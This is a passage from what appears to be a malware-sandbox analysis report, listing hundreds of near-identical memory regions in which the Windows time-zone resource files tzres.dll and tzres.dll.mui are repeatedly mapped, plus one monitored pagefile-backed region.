filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2833
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2834
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2835
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2836
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2837
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2838
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2839
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2840
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2841
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2842
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2843
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2844
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2845
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2846
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2847
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2848
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2849
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2850
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2851
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2852
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2853
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2854
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2855
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2856
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2857
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2858
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2859
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2860
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2861
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2862
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2863
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2864
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2865
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2866
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2867
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2868
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2869
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2870
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2871
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2872
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2873
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2874
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2875
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2876
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2877
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2878
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2879
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2880
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2881
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2882
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2883
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2884
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2885
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2886
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2887
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2888
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2889
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2890
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2891
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2892
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2893
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2894
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2895
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2896
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2897
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2898
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2899
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2900
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2901
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2902
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2903
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2904
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2905
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2906
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2907
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2908
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2909
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2910
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2911
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2912
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2913
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2914
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2915
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2916
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2917
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2918
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2919
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2920
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2921
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2922
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2923
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2924
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2925
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2926
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2927
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2928
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2929
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2930
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2931
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2932
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2933
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2934
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2935
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2936
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2937
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2938
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2939
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2940
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2941
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2942
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2943
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2945
start_va = 0xa90000
end_va = 0xa95fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a90000"
filename = ""
Region:
id = 2946
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2947
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2948
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2949
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
